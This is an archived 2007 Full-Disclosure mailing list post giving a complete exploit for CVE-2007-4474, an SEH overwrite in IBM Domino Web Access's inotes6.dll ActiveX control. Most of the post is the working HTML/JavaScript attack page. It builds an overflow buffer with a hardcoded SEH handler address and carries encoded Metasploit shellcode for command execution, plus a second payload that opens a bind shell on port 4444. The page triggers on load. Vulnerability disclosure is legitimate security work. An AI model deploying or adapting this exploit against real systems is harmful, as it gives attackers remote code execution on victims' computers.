| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 30 Dec 2007 20:19:24 -0500
From: <elazar@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc:
Subject: IBM Domino Web Access inotes6.dll SEH Overwrite
Exploit
My first attempt at an SEH overwrite exploit. Anyhow, I first
posted about this issue regarding version 7 of this control, Will
Dormann of the CERT/CC discovered versions 6 and 6.5 are vulnerable
too, see http://www.kb.cert.org/vuls/id/963889. Dwa7w.dll and
inotes6w.dll are unicode, thats my next project. Code is inline and
attached.
---------------------
<!--
written by e.b.
IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite
Exploit
Bad chars: 0x80+
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6.dll
version 6.0.40.0 and version 6.0.48.0
Thanks to str0ke for pointing me in the right direction and to
h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>IBM Domino Web Access Upload Module inotes6.dll SEH
Overwrite Exploit</title>
<script language="JavaScript" defer>
function Check() {
var buf = 'A';
while (buf.length <= 3119) buf = buf + 'A';
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
"%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" +
"%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" +
"%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" +
"%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" +
"%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" +
"%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" +
"%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" +
"%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" +
"%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" +
"%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" +
"%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" +
"%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" +
"%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" +
"%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" +
"%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" +
"%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" +
"%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" +
"%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" +
"%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" +
"%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" +
"%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" +
"%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" +
"%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" +
"%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" +
"%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" +
"%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" +
"%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +
"%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" +
"%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" +
"%73%71%78%58%67%61%69%69%56%71%69%62%77%39%6f%6a" +
"%76%51%45%49%6f%4e%30%51%76%53%5a%71%74%72%46%62" +
"%48%30%63%30%6d%6c%49%5a%45%63%5a%62%70%76%39%31" +
"%39%58%4c%4e%69%4d%37%53%5a%33%74%4e%69%4b%52%56" +
"%51%4b%70%6c%33%6f%5a%49%6e%33%72%44%6d%6b%4e%37" +
"%32%76%4c%6e%73%6c%4d%70%7a%76%58%6c%6b%4e%4b%4c" +
"%6b%73%58%53%42%79%6e%6d%63%74%56%6b%4f%30%75%70" +
"%44%4b%4f%79%46%53%6b%70%57%70%52%71%41%50%51%42" +
"%71%41%7a%33%31%42%71%41%41%51%45%66%31%69%6f%5a" +
"%70%50%68%6e%4d%5a%79%56%65%68%4e%33%63%39%6f%58" +
"%56%63%5a%4b%4f%4b%4f%70%37%4b%4f%4a%70%4c%4b%61" +
"%47%6b%4c%4d%53%6b%74%31%74%49%6f%59%46%70%52%59" +
"%6f%4e%30%63%58%6c%30%6f%7a%57%74%61%4f%32%73%4b" +
"%4f%68%56%39%6f%38%50%43");
var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump
//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop -
retbis
//no SafeSEH
var seh_handler = unescape("%50%69%C9%74");
var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");
var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 +
nop;
obj.General_ServerName = m;
obj.InstallBrowserHelperDll();
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-
00A024A51325">
Unable to create object
</object>
</body>
</html>
---------------------
Elazar
--
Compare Cell Phone Carriers- Click Now.
http://tagline.hushmail.com/fc/Ioyw6h4fMiW01DlRT5EdxG74bAoErxGvZoOSv1JtIEt847RmpKnqQI/
View attachment "ibm-dwa-upload-inotes6-sehoverwrite.html" of type "text/html" (6862 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists